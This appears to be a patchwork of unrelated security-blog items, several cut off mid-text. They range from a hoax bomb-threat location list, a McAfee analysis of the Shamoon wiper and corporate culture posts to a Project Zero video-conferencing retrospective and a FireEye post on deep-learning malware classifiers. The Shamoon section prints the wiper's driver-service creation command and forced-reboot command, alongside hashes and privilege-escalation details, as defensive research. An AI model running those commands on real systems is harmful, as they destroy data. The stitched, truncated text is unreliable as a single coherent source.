Even AFTER it was well known that these were hoaxes, many law enforcement agencies continued to respond with full bomb squad roll-outs.  Given the history in Oklahoma City, this was especially understandable there, but wasted a tremendous amount of resources as they responded to AT LEAST thirteen threats just in that city!

Here are a few examples, and then a longer list in Table form:
Each entry in the table below is an "official" tweet indicating local law enforcement responded to a bomb threat in that area. If your locality is not listed, please search for "official" notices for your area and share them in our comments section. Thanks!

Calgary, Alberta, CA
Calgary, Alberta, CA
Winnipeg, Manitoba, CA
London, Ontario, CA
Toronto, Ontario, CA
Anniston, Alabama
Pelham, Alabama
Anchorage, Alaska
Phoenix, Arizona
Bakersfield, California
Chico, California
Chino, California
Garden Grove, California
Los Angeles, California
San Francisco, California
San Francisco, California
Santa Rosa, California
Ottawa, Canada
Aurora, Colorado
Fort Collins, Colorado
Danbury, Connecticut
Wallingford, Connecticut
Ocala, Florida
Sanford, Florida
Tampa, Florida
Atlanta, Georgia
Dekalb County, Georgia
Valdosta, Georgia
Honolulu, Hawaii
Chicago, Illinois
Chicago, Illinois
Indianapolis, Indiana
Cedar Rapids, Iowa
Wichita, Kansas
Wichita, Kansas
Lexington, Kentucky
Portland, Maine
Frederick, Maryland
Salisbury, Maryland
Boston, Massachusetts
Salisbury, Massachusetts
Massachusetts State Police
Detroit, Michigan
Grand Blanc, Michigan
Grand Rapids, Michigan
Long Beach, Mississippi
Raleigh, NC
Lincoln, Nebraska
Lincoln, Nebraska
Omaha, Nebraska
Linden, New Jersey
Buffalo, New York
Buffalo, New York
Buffalo, New York
New York, New York
Niagara Falls, New York
Rochester, New York
Boone, North Carolina
Boone, North Carolina
UNC Raleigh, North Carolina
Cleveland, Ohio
Columbus, Ohio
Bexley, Ohio (Capital University)
Oklahoma City, Oklahoma
Oklahoma City, Oklahoma
Tulsa, Oklahoma
Erie, Pennsylvania
Lancaster, Pennsylvania
Memphis, Tennessee
Beaumont, Texas
El Paso, Texas
Frisco, Texas
Houston, Texas
Lubbock, Texas
Rosenberg, Texas
St. George, Utah
St. George, Utah
Chesterfield County, Virginia
Hampton Roads, Virginia
Bellevue, Washington
Massachusetts State Police
Michigan State Police
Michigan State Police
Notre Dame University
Washington DC

How to protect Windows 10 PCs from ransomware

CryptoLocker. WannaCry. Petya. Bad Rabbit. The ransomware threat isn’t going away anytime soon; the news brings constant reports of new waves of this pernicious type of malware washing across the world. It’s popular in large part because of the immediate financial payoff for attackers: It works by encrypting the files on your hard disk, then demands that you pay a ransom, frequently in Bitcoins, to decrypt them.

But you needn’t be a victim. There’s plenty that Windows 10 users can do to protect themselves against it. In this article, I’ll show you how to keep yourself safe, including how to use an anti-ransomware tool built into Windows 10.


Shamoon Returns to Wipe Systems in Middle East, Europe

Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims.

Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can take weeks or months, resulting in lost profits and a diminished reputation.

Recent attacks have demonstrated how big the damage can be. Last year NotPetya affected several companies around the world. Last February, researchers uncovered OlympicDestroyer, which affected the Olympic Games organization.

Shamoon is destructive malware that McAfee has been monitoring since its appearance. The most recent wave struck early this month when the McAfee Foundstone Emergency Incident Response team reacted to a customer’s breach and identified the latest variant. Shamoon hit oil and gas companies in the Middle East in 2012 and resurfaced in 2016 targeting the same industry. This threat is critical for businesses; we recommend taking appropriate actions to defend your organizations.

During the past week, we have observed a new variant attacking several sectors, including oil, gas, energy, telecom, and government organizations in the Middle East and southern Europe.

Similar to the previous wave, Shamoon Version 3 uses several mechanisms as evasion techniques to bypass security as well to circumvent analysis and achieve its ends. However, its overall behavior remains the same as in previous versions, rendering detection straightforward for most antimalware engines.

As in previous variants, Shamoon Version 3 installs a malicious service that runs the wiper component. Once the wiper is running, it overwrites all files with random rubbish and triggers a reboot, resulting in a “blue screen of death” or a driver error and making the system inoperable. The variant can also enumerate the local network, but in this case does nothing with that information. This variant has some bugs, suggesting that this version may be a beta or test release.

The main differences from earlier versions are the name list used to drop the malicious file and the fabricated service name MaintenaceSrv (with “maintenance” misspelled). The wiping component has also been designed to target all files on the system with these options:

  • Overwrite file with garbage data (used in this version and the samples we analyzed)
  • Overwrite with a file (used in Shamoon Versions 1 and 2)
  • Encrypt the files and master boot record (not used in this version)

Shamoon is modular malware: The wiper component can be reused as a standalone file and weaponized in other attacks, making this threat a high risk. The post presents our findings, including a detailed analysis and indicators of compromise.


Shamoon is a dropper that carries three resources. The dropper is responsible for collecting data as well as embedding evasion techniques such as obfuscation, antidebugging, or antiforensic tricks. The dropper requires an argument to run.

It decrypts the three resources and installs them on the system in the %System% folder. It also creates the service MaintenaceSrv, which runs the wiper. The typo in the service name eases detection.

The Advanced Threat Research team has watched this service evolve over the years. The following tables highlight the differences:

The wiper uses ElRawDisk.sys to access the user’s raw disk and overwrites all data in all folders and disk sectors, causing a critical state of the infected machine before it finally reboots.

The result is either a blue screen or driver error that renders the machine unusable.



Executable summary

The dropper contains other malicious components masked as encrypted files embedded in its PE sections.

These resources are decrypted by the dropper and contain:

  • MNU: The communication module
  • LNG: The wiper component
  • PIC: The 64-bit version of the dropper

Shamoon 2018 needs an argument to run and infect machines. It decrypts several strings in memory that gather information on the system and determine whether to drop the 32-bit or 64-bit version.

It also drops the file (MD5: 41f8cd9ac3fb6b1771177e5770537518) in the folder c:\Windows\Temp\

The malware decrypts two files used later:

  • C:\Windows\inf\mdmnis5tQ1.pnf
  • C:\Windows\inf\averbh_noav.pnf

Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy.

The malware checks whether the following shares exist to copy itself and spread:

  • ADMIN$

Shamoon queries the service to retrieve specific information related to the LocalService account.

It then retrieves the resources within the PE file to drop the components. Finding the location of the resource:

Shamoon creates the file and sets the time to August 2012 as an antiforensic trick. It puts this date on any file it can destroy.

The modification time can be used as an antiforensic trick to bypass detection based on the timeline, for example. We also observed that in some cases the date is briefly modified on the system, faking the date of each file. The files dropped on the system are stored in C:\Windows\System32\.

Before creating the malicious service, Shamoon elevates its privilege by impersonating the token. It first uses LogonUser and ImpersonateLoggedOnUser, then ImpersonateNamedPipeClient. Metasploit uses a similar technique to elevate privileges.

Elevating privileges is critical for malware to perform additional system modifications, which are usually restricted.

Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10):

If the service has already been created, Shamoon updates its configuration with the parameters above.

It finally finishes creating MaintenaceSrv:

The wiper dropped on the system can have any one of the following names:



Next the wiper runs to destroy the data.


The wiper component is dropped into the System32 folder. It takes one parameter to run. The wiper driver is embedded in its resources.

We can see the encrypted resources, 101, in this screenshot:

The resource decrypted is the driver ElRawDisk.sys, which wipes the disk.

Extracting the resource:

The preceding file is not malicious by itself but is considered risky because it is the original driver.

The wiper creates a service to run the driver with the following command:

sc create hdv_725x type= kernel start= demand binpath= WINDOWS\hdv_725x.sys 2>&1 >nul


The following screenshot shows the execution of this command:


The malware overwrites every file in c:\Windows\System32, placing the machine in a critical state. All the files on the system are overwritten.

The overwriting process:

Finally, it forces the reboot with the following command:

Shutdown -r -f -t 2


Once the system is rebooted it shows a blue screen:


The worm component is extracted from the dropper's resources. Destructive malware usually uses spreading techniques to infect machines as quickly as possible.

The worm component can take the following names:

We noticed the capability to scan for the local network and connect to a potential control server:

Although the worm component can spread the dropper and connect to a remote server, the component was not used in this version.


Aside from the major destruction this malware can cause, the wiper component can be used independently from the dropper. The wiper does not have to rely on the main stub process. The 2018 Shamoon variant’s functionality indicates modular development. This enables the wiper to be used by malware droppers other than Shamoon.

Shamoon is showing signs of evolution; however, these advancements did not escape detection by McAfee DATs. We expect to see additional attacks in the Middle East (and beyond) by these adversaries. We will continue to monitor our telemetry and will update this analysis as we learn more.

MITRE ATT&CK™ matrix

Indicators of compromise

df177772518a8fcedbbc805ceed8daecc0f42fed    Original dropper x86
ceb7876c01c75673699c74ff7fac64a5ca0e67a1    Wiper
10411f07640edcaa6104f078af09e2543aa0ca07    Worm module
bf3e0bc893859563811e9a481fde84fe7ecd0684    RawDisk driver


McAfee detection

  • Trojan-Wiper!DE07C4AC94A5
  • RDN/Generic.dx
  • Trojan-Wiper

The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs.

Chinese hackers reportedly hit Navy contractors with multiple attacks

Chinese hackers have been targeting US Navy contractors, and were reportedly successful on several occasions over the last 18 months. The infiltrators stole information including missile plans and ship maintenance data, according to a Wall Street Journal report that cites officials and security experts.

Source: Wall Street Journal

Why I Bring My Authentic Self to Work at McAfee

By Kristol, Sales Account Manager and President, McAfee African Heritage Community

If you talked to me when I first started working at McAfee, I wouldn’t have believed you if you told me that I’d still be working here 16 years later. But I am still working here, and I’ve grown from every challenge and success in my cybersecurity journey. Most of all, I’m thankful to work for an employee-first company.

When I walk through our Plano office doors, it’s like walking into my second home. At my desk, I even have my own as-seen-on-TV “Snuggie” blanket in case I get cold while I’m working.

Early in my career at McAfee, I formed an immediate bond with my new teammates in operations. It was clear to me that they would soon become family. Over the years, we have shared milestones, marriages, births, and burials. And as I’ve moved from role to role at McAfee, I’ve noticed a trend: these wonderful working relationships have continued. My experience has remained consistent as I’ve moved between departments, from operations to finance and sales.

During my tenure, I have experienced a transition from a married woman with a five-year-old daughter and three-year-old son, to a divorcée who is approaching an “empty nesting” season of life. My transition has brought challenging personal experiences—and McAfee was the only constant in my life. Work/life balance as a single mother was critical to my personal and professional success. McAfee’s leadership approach has always been sensitive—not only to what’s best for the bottom line, but what’s best for the employee.


Culture and Office Camaraderie

One of my favorite parts about working at McAfee is the fun culture! In the last 16 years, I have had seven different roles—each with new challenges and skillsets to prepare me for the next level. It has been one adventurous ride—from recording a sales kick-off video meeting, to dress-up shenanigans, to singing “Proud Mary” at a Christmas event (and winning!).

Ten years ago, I started a Holiday Candle Exchange party with the women here in our Plano office. My goal was to put names to faces, network with other women at McAfee and, of course, get a great candle for the season! The event started with four to six women and has grown to over 20 women annually. This is one of McAfee’s best attributes: the ability to innovate without fear and cultivate an inclusive culture, right where you are!

Becoming a Leader in the African Heritage Community

In 2017, I proudly accepted the appointment to become the President of the McAfee African Heritage Community (MAHC), one of our diversity and inclusion chapters. It’s been an honor to be a part of an organization that celebrates diversity while fostering inclusion and professional growth. The MAHC chapter is led by talented individuals from different business units across the company—like human resources, training, support, and operations.

Our chapter is focused on staying connected, cultivating our organization, and committing to professional and personal growth, while centering ourselves within the community.

How McAfee Has Supported My Development

I have truly been blessed to be an employee at McAfee. I work with teammates, managers, and executives who push me to be a better version of myself every single day. They challenge my way of thinking and motivate me to look beyond the present. To prepare for unknown surprises. To accept defeat and learn from it. To be confident in my decisions and trust myself. To never stop learning, believing and dreaming!

This is my life at McAfee…and it’s a wonderful life!



For more stories like this, follow @LifeAtMcAfee on Instagram and @McAfee on Twitter to see what working at McAfee is all about. Interested in joining our teams? We’re hiring! Apply now!

The post Why I Bring My Authentic Self to Work at McAfee appeared first on McAfee Blogs.

Point of View Matters

Just a quick thought this morning as I read the news about the attack against Italian oil services firm Saipem on Twitter and other news outlets. It struck me fairly quickly that much of what my security industry peers read is very one-sided, and perspective matters.

Allow me to illustrate.

This article shows up on most of the business wires; it's from Reuters:
It's short and gets to the point quickly.

  • the attack on the firm will have no impact on the group's revenues
  • a cyber attack crippled over 300 computers and servers in the Middle East
Short. To the point. Leads with the big story first (no revenue impact).

This article was retweeted widely on the hacker and information security Twitter feeds:
It paints a different story.
  • uses words like "notorious", and highlights an outage
  • it focuses on the negative technological impact of the attack
  • likens it to the Saudi Aramco attack and "one of the most destructive cyberattacks in history"

Saipem's own website is much more frank and simple in its explanation.

Now, let's get perspective.

Corporate leadership likely reads the short version, on Reuters, which basically says "No financial impact, some computers got broken, move on." On the security side, we see a different, more in-depth (obviously) story develop. Now when you go to your CEO or CFO and say "We need to do more to protect ourselves so we're not the next Saipem," your CFO/CEO will likely look back at you and ask why. There was no revenue impact, and the risk seems to have been appropriately handled.

Think about this, as you look at security risks to your organization.

Risky Biz Soap Box: From 2 billion events to 350 alerts with Respond Software

Soap Box is the podcast series we do here at Risky.Biz where we have detailed discussions with vendors about all sorts of stuff – sometimes it’s about their products, other times it’s about the landscape as they see it, other times it’s about research they’ve done that they want to promote. Soap Box is a wholly sponsored podcast series – just so you know – so everyone you hear on it paid to be on it.

And this Soap Box edition is brought to you by Respond Software. We’ll be joined by Respond Software’s co-founder and CEO, Mike Armistead, to talk about Respond’s tech. Mike has an interesting history in infosec… he actually co-founded Fortify, the software security firm, before winding up at HPE as the VP and General Manager for ArcSight, the poor fella. But he’s free now! Freeeeeee! And he’s co-founded the venture we’re talking about today.

So, what’s the idea behind Respond Software? Well, to break it down into really simple terms the whole idea is to take all the zillions of events your existing security kit flags and distill them down into meaningful alerts. To put this into context, Mike says that during the 30 days in the lead up to the interview we recorded, his customers fed two billion events into their Respond Software gear. Of those two billion events, Respond deemed 7 million of them worthy of escalation, and from there determined 45,000 were malicious, but then… and this is the cool part, this only resulted in 350 incidents raised by the Respond platform. From 2 billion to 350.
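As a quick sanity check on those numbers, the reduction at each stage works out like this (simple arithmetic on the figures Mike quoted; the stage names are our own labels):

```python
# Figures quoted in the interview, covering a 30-day window.
stages = {
    "raw events": 2_000_000_000,
    "escalated": 7_000_000,
    "deemed malicious": 45_000,
    "incidents raised": 350,
}

names = list(stages)
for prev, cur in zip(names, names[1:]):
    print(f"{prev} -> {cur}: {stages[prev] / stages[cur]:,.0f}x reduction")

overall = stages["raw events"] / stages["incidents raised"]  # roughly 5.7 million to 1
```

In other words, roughly one incident raised per 5.7 million raw events, which is the whole pitch in a single ratio.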

So it’s a great idea – tune out the crap and look at meaningful correlations. Automate the decision making around what’s serious and what’s not. You’ve got all this gear, maybe you’ve got something aggregating it, but what’s applying decision logic to it?

Mike sent me a list of software Respond currently supports: all manner of IDSes, AV and EDR suites and then other stuff that gives their software the context it needs to make better decisions, like Active Directory, Nessus, Qualys, Splunk, QRadar… whatever! The idea is, plug ALL your over-alerting crap into Respond Software’s gear and it’ll do a good enough job of correlating events that you’ll only have to deal with what’s real. Well, that’s the pitch. Mike Armistead joined me to flesh it out a bit more.

Playbook Fridays: Github Activity Monitor

This Playbook is designed to automate the monitoring and alerting of Github activity for a given user

ThreatConnect developed the Playbooks capability to help analysts automate time-consuming and repetitive tasks so they can focus on what is most important – and, in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

Many malicious actors, from unsophisticated defacers to sophisticated actors, use Github to develop and/or serve malicious content. This is largely because Github offers version control and Github Pages for automatically deploying content.

With so much diverse, malicious activity on Github, it is important to be able to track the changes on a malicious code repository. This Playbook is designed to automate the monitoring and alerting of Github activity for a given user. In this way, you can get an alert whenever a Github user performs a public action.

This Playbook is based on the Page Monitor.pbx Playbook. It is designed to be run once a week and uses Github’s public API to check whether there is any new activity. If there is new content, it sends an alert (in this case via Slack).
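Outside of ThreatConnect, the core check (fetch a user's public events and alert on anything new) could be sketched in Python like this; the endpoint is Github's public events API, while the helper names and the offline sample data are invented for illustration:

```python
import json
import urllib.request

EVENTS_URL = "https://api.github.com/users/{user}/events/public"

def fetch_events(user):
    """Fetch the user's recent public events from Github's REST API."""
    with urllib.request.urlopen(EVENTS_URL.format(user=user)) as resp:
        return json.load(resp)

def new_events(events, last_seen_id):
    """Keep only events newer than the last one we alerted on (event ids increase over time)."""
    return [e for e in events if int(e["id"]) > int(last_seen_id)]

def summarize(event):
    """One-line summary suitable for a Slack (or email) alert."""
    return f'{event["type"]} in {event["repo"]["name"]} at {event["created_at"]}'

# Offline example; a weekly job would instead call fetch_events("<user>")
# and persist the newest id between runs.
sample = [
    {"id": "3", "type": "PushEvent", "repo": {"name": "someuser/somerepo"},
     "created_at": "2018-12-01T00:00:00Z"},
    {"id": "1", "type": "WatchEvent", "repo": {"name": "someuser/somerepo"},
     "created_at": "2018-11-01T00:00:00Z"},
]
fresh = new_events(sample, last_seen_id="2")
```

The Playbook's datastore apps play the role of "persist the newest id between runs" here.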

Installing the Playbook

To install the Playbook, download the Github Activity Monitor.pbx Playbook and install it in ThreatConnect from the Playbooks page. Once it is installed, start by editing the “Set Variables” app (the Playbook app right after the trigger). You will need to provide the “slackChannel” variable to which messages will be sent and the “githubUserName” variable you would like to monitor. A few other apps need credentials and other information as well. The best way to find which apps still need to be updated is to try to turn the Playbook on, which will give you a list of apps that still need to be modified. Among the apps that need to be edited are the Slack apps and the datastore apps.

But what if you don’t use Slack? Easy: the Slack apps can be replaced with an app to send an email, create a task in ThreatConnect, or create a Jira issue (among other options). If you have any questions or run into any problems with anything mentioned in this blog, please raise an issue in Github! If you would like to have your app or playbook featured in a Playbook Friday blog post, submit it to our Playbook repository (instructions are provided there).


The post Playbook Fridays: Github Activity Monitor appeared first on ThreatConnect | Intelligence-Driven Security Operations.

Insurance Companies Say NotPetya Means War (And Therefore No Coverage)

Add cyberwar to the long list of reasons why insurance companies will deny claims. Essentially, Zurich’s position is that NotPetya was a “hostile or warlike action” by a “government or sovereign power.” In fact, NotPetya is widely viewed as a state-sponsored Russian cyber attack masquerading as ransomware that was designed to target Ukraine but …

McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals

The Cyber Security Gurukul Series is an initiative by the ‘Women Wizards Rule Tech (W2RT)’, a unique program designed exclusively for women professionals in core technologies by noted industry body NASSCOM. Focused specifically on IT-ITES/BPM, product, and R&D firms, the key aim of this initiative is to equip women with deeper knowledge of various technologies and thereby nurture them as leaders for tomorrow. It is an initiative McAfee is proud to partake in, which is why on December 4th, McAfee India hosted close to 40 women professionals from many organizations, including McAfee, as part of NASSCOM’s Cybersecurity Gurukul series.

The half-day session started with a keynote from Venkat Krishnapur, VP Engineering & Managing Director, McAfee India. Addressing the group on “Countering Emerging Threats by Building Security DNA of your Organization”, Venkat discussed how the exponential growth of connected devices over the past few years has left organizations and individuals more prone to cyberattacks than ever before. He also covered other key topics, such as the increase in the number of cyberattacks, the variety and evolution of malware, the importance of cloud security in today’s day and age, and how security organizations such as McAfee invest in both technology and people.

Following Venkat’s keynote session, Sandeep Kumar Singh, Security Researcher and SSA Lead, McAfee India, hosted a two-hour session for the attendees. The session touched upon various facets of the “Introduction to Security Deployment Lifecycle”: why it’s imperative for organizations to invest in SDL, the key ingredients of a successful security program, and a walkthrough of key SDL activities. Sandeep also spoke to the group about how choosing a career in cybersecurity will give them a competitive edge, as a shortage of professionals in this field remains a critical vulnerability for organizations and nations alike.

Overall, the event was quite the hit with attendees – as proven by demos, quizzes, and an interactive Q&A session. Sharing their feedback on the event, one of the participants said:

“The Cyber Security session which I attended today at McAfee India will go a long way in helping us enhance our knowledge and skills. The presentation given by Sandeep was excellent and the slides prepared by him were crisp and clear. We’d like to thank NASSCOM for arranging these sessions and we are looking for more such classroom sessions coming on our way.”

Sessions and programs such as these will go a long way in ensuring that organizations help pave the way for women to enhance their skills, as well as give them an edge in their career development. McAfee is proud to play a role in influencing the overall India/APAC digital security ecosystem through its thought leadership.

The post McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals appeared first on McAfee Blogs.

How to Stay Secure from the Latest Volkswagen Giveaway Scam

You’re scrolling through Facebook and receive a message notification. You open it and see it’s from Volkswagen, claiming that the company will be giving away 20 free vehicles before the end of the year. If you think you’re about to win a new car, think again. This is likely a fake Volkswagen phishing scam, which has been circulating social media channels like WhatsApp and Facebook, enticing hopeful users looking to acquire a new ride.

This fake Volkswagen campaign works differently than your typical phishing scam. The targeted user receives the message via WhatsApp or Facebook and is prompted to click on the link to participate in the contest. But instead of attempting to collect personal or financial information, the link simply redirects the victim to what appears to be a standard campaign site in Portuguese. When the victim clicks the buttons on the website, they are redirected to a third-party advertising site asking them to share the contest link with 20 of their friends. The scam authors, under the guise of being associated with Volkswagen, promise to contact the victims via Facebook once this task is completed.

As of now, we haven’t seen indicators that participants have been infected by malicious software or had any personal information stolen as a result of this scam. But because the campaign link redirects users to ad servers, the scam authors are able to maximize revenue for the advertising network. This encourages malicious third-party advertisers to continue these schemes in order to make a profit.

The holidays in particular are a convenient time for cybercriminals to create more scams like this one, as users look to social media for online shopping inspiration. Because schemes such as this could potentially be profitable for cybercriminals, it is unlikely that phishing scams spread via social media will let up. Luckily, we’ve outlined the following tips to help dodge fake online giveaways:

  • Avoid interacting with suspicious messages. If you receive a message from a company asking you to enter a contest or share a certain link, it is safe to assume that the sender is not from the actual company. Err on the side of caution and don’t respond to the message. If you want to see if a company is actually having a sale, it is best to just go directly to their official site to get more information.
  • Be careful what you click on. If you receive a message in an unfamiliar language, one that contains typos, or one that makes claims that seem too good to be true, avoid clicking on any attached links.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help safeguard you from malware and warn you of phishing attempts so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘Liking’ us on Facebook.

The post How to Stay Secure from the Latest Volkswagen Giveaway Scam appeared first on McAfee Blogs.

Adventures in Video Conferencing Part 5: Where Do We Go from Here?

Posted by Natalie Silvanovich, Project Zero

Overall, our video conferencing research found a total of 11 bugs in WebRTC, FaceTime and WhatsApp. The majority of these were found through less than 15 minutes of mutation fuzzing RTP. We were surprised to find remote bugs so easily in code that is so widely distributed. There are several properties of video conferencing that likely led to the frequency and shallowness of these issues.

WebRTC Bug Reporting

When we started looking at WebRTC, we were surprised to discover that their website did not describe how to report vulnerabilities to the project. They had an open bug tracker, but no specific guidance on how to flag or report vulnerabilities. They also provided no security guidance for integrators, and there was no clear way for integrators to determine when they needed to update their source for security fixes. Many integrators seem to have branched WebRTC without consideration for applying security updates. The combination of these factors makes it more likely that vulnerabilities did not get reported, that vulnerabilities or fixes got ‘lost’ in the tracker, that fixes regressed, or that fixes did not get applied to implementations that use the source in part.

We worked with the WebRTC team to add this guidance to the site, and to clarify their vulnerability reporting process. Despite these changes, several large software vendors reached out to our team with questions about how to fix the vulnerabilities we reported. This shows there is still a lack of clarity on how to fix vulnerabilities in WebRTC.

Video Conferencing Test Tools

We also discovered that most video conferencing solutions lack adequate test tools. In most implementations, there is no way to collect data that allows for problems with an RTP stream to be diagnosed. The vendors we asked did not have such a tool, even internally. WebRTC had a mostly complete tool that allows streams to be recorded in the browser and replayed, but it did not work with streams that used non-default settings. This tool has now been updated to collect enough data to be able to replay any stream. The lack of tooling available to test RTP implementations likely contributed to the ease of finding vulnerabilities, and certainly made reproducing and reporting vulnerabilities more difficult.

Video Conferencing Standards

The standards that comprise video conferencing such as RTP, RTCP and FEC introduce a lot of complexity in achieving their goal of enabling reliable audio and video streams across any type of connection. While the majority of this complexity provides value to the end user, it also means that it is inherently difficult to implement securely.

The Scope of Video Conferencing

WebRTC has billions of users. While it was originally created for use in the Chrome browser, it is now integrated into at least two Android applications that eclipse Chrome in terms of users: Facebook and WhatsApp (which only uses part of WebRTC). It is also used by Firefox and Safari. It is likely that most mobile devices run multiple copies of the WebRTC library. The ubiquity of WebRTC, coupled with the lack of a clear patch strategy, makes it an especially concerning target for attackers.

Recommendations for Developers

This section contains recommendations for developers who are implementing video conferencing based on our observations from this research.

First, it is a good idea to use an existing solution for video conferencing (either WebRTC or PJSIP) as opposed to implementing a new one. Video conferencing is very complex, and every implementation we looked at had vulnerabilities, so it is unlikely a new implementation would avoid these problems. Existing solutions have undergone at least some security testing and would likely have fewer problems.

It is also advisable to avoid branching existing video conferencing code. We have received questions from vendors who have branched WebRTC, and it is clear that this makes patching vulnerabilities more difficult. While branching can solve problems in the short term, integrators often regret it in the long term.

It is important to have a patch strategy when implementing video conferencing, as there will inevitably be vulnerabilities found in any implementation that is used. Developers should understand how security patches are distributed for any third-party library they integrate, and have a plan for applying them as soon as they are available.

It is also important to have adequate test tools for a video conferencing application, even if a third-party implementation is used. It is a good idea to have a way to reproduce a call from end to end. This is useful in diagnosing crashes, which could have a security impact, as well as functional problems.

Several mobile applications we looked at had unnecessary attack surface. Specifically, codecs and other features of the video conferencing implementation were enabled and accessible via RTP even though no legitimate call would ever use them. WebRTC and PJSIP support disabling specific features such as codecs and FEC. It is a good idea to disable the features that are not being used.

Finally, video conferencing vulnerabilities can generally be split into those that require the target to answer the incoming call, and those that do not. Vulnerabilities that do not require the call to be answered are more dangerous. We observed that some video conferencing applications perform much more parsing of untrusted data before a call is answered than others. We recommend that developers put as much functionality after the call is answered as possible.


In order to open up the most popular video conferencing implementations to more security research, we are releasing the tools we developed to do this research. Street Party is a suite of tools that allows the RTP streams of video conferencing implementations to be viewed and modified. It includes:

  • WebRTC: instructions for recording and replaying RTP packets using WebRTC’s existing tools
  • FaceTime: hooks for recording and replaying FaceTime calls
  • WhatsApp: hooks for recording and replaying WhatsApp calls on Android

We hope these tools encourage even more investigation into the security properties of video conferencing. Contributions are welcome.


We reviewed WebRTC, FaceTime and WhatsApp and found 11 serious vulnerabilities in their video conferencing implementations. Accessing and altering their encrypted content streams required substantial tooling. We are releasing this tooling to enable additional security research on these targets. There are many properties of video conferencing that make it susceptible to vulnerabilities. Adequate testing, conservative design and frequent patching can reduce the security risk of video conferencing implementations.

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.


  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.


Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).

Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE file.
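As a rough illustration of steps (2) through (5), here is a toy, pure-Python sketch of a single convolutional filter over an embedded byte sequence. The dimensions are tiny and the weights are random stand-ins for learned parameters; the real classifier is far larger and trained end to end.

```python
import random

random.seed(7)
EMBED_DIM, WINDOW = 4, 8  # toy sizes for illustration only

# (2) Embedding: each byte value maps to a small vector. Here the vectors are
# random; in the real classifier they are learned during training.
embedding = {b: [random.uniform(-1, 1) for _ in range(EMBED_DIM)]
             for b in range(256)}

# (3) One convolutional filter: one weight per (window position, embedding dim).
conv_filter = [[random.uniform(-1, 1) for _ in range(EMBED_DIM)]
               for _ in range(WINDOW)]

def convolve(raw: bytes):
    """Slide the filter across the embedded byte sequence: one activation per window."""
    embedded = [embedding[b] for b in raw]
    return [sum(conv_filter[j][d] * embedded[i + j][d]
                for j in range(WINDOW) for d in range(EMBED_DIM))
            for i in range(len(embedded) - WINDOW + 1)]

def max_pool(activations):
    """(5) Keep the strongest response the filter produced anywhere in the input."""
    return max(activations)

acts = convolve(bytes(range(64)))  # 64 input bytes -> 57 window positions
pooled = max_pool(acts)
```

In the actual architecture, many such filters run in parallel and the convolve/pool pair is stacked several layers deep before the fully-connected classifier in step (6).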

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.
